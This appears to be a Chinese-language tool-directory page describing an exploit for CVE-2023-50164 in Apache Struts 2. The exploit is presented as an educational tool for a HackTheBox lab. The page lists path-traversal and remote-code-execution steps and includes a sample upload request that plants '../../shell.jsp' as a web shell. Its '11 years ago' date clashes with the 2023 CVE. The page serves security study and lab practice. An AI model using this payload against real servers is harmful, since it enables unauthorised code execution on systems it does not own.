Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-50164 — 针对CVE-2023-50164(Apache Struts 2)的教育性漏洞利用工具,演示通过恶意文件上传实现的路径遍历和远程代码执行,专为HackTheBox实验室环境设计。 | Kitploit
工具/GitHubGitHub/pixel-defaultbr/cve-2023-50164
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubpixel-defaultbr/cve-2023-50164

CVE-2023-50164

针对CVE-2023-50164(Apache Struts 2)的教育性漏洞利用工具,演示通过恶意文件上传实现的路径遍历和远程代码执行,专为HackTheBox实验室环境设计。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

针对 HackTheBox 实验室的 CVE-2023-50164 漏洞利用程序

描述

此 exploit 专为 HackTheBox 的 Strutted 实验室开发,旨在利用 Apache Struts 2 中的 CVE-2023-50164 漏洞。该缺陷通过文件上传参数处理中的漏洞实现 路径遍历。本漏洞利用程序旨在演示攻击者如何上传 恶意文件 并实现 远程代码执行 (RCE)。

注意:

此 exploit 仅用于 HackTheBox 受控环境中的教育目的,不得在未经明确许可的情况下用于真实系统。未经同意利用漏洞是非法且不道德的。

目标

该漏洞利用程序的目标是演示 Apache Struts 2 中的缺陷(特别是文件上传端点)如何被利用来实现:

  1. 执行路径遍历 并访问未授权文件。
  2. 上传恶意文件 至服务器。
  3. 远程执行代码 (RCE) 在受影响服务器上。

技术描述

CVE-2023-50164 漏洞与文件上传参数的不正确处理有关,允许攻击者操纵上传的文件名以实现 路径遍历。

漏洞利用步骤

  1. HTTP 参数操纵:漏洞利用程序修改 HTTP 参数以包含目录遍历字符 (../),从而允许将恶意文件上传到未授权文件夹。

  2. 发送恶意文件:漏洞利用程序通过 POST 方法向 /upload.action 端点发送恶意文件,利用 HTTP 参数的 大小写敏感性 缺陷。

  3. 远程代码执行:攻击者可插入恶意代码,该代码在文件上传后将在服务器上执行。

HTTP 请求示例

以下是一个可用于利用该漏洞的 HTTP 请求示例:

root@kitploit:~
POST /upload.action HTTP/1.1
Host: vulnerable-server.com
Content-Type: multipart/form-data; boundary=------------------------abcdef
--------------------------abcdef
Content-Disposition: form-data; name="Upload"; filename="img.png"
Content-Type: application/octet-stream
PNG


--------------------------abcdef
Content-Disposition: form-data;
Content-Type: application/octet-stream

../../shell.jsp
--------------------------abcdef--
下载工具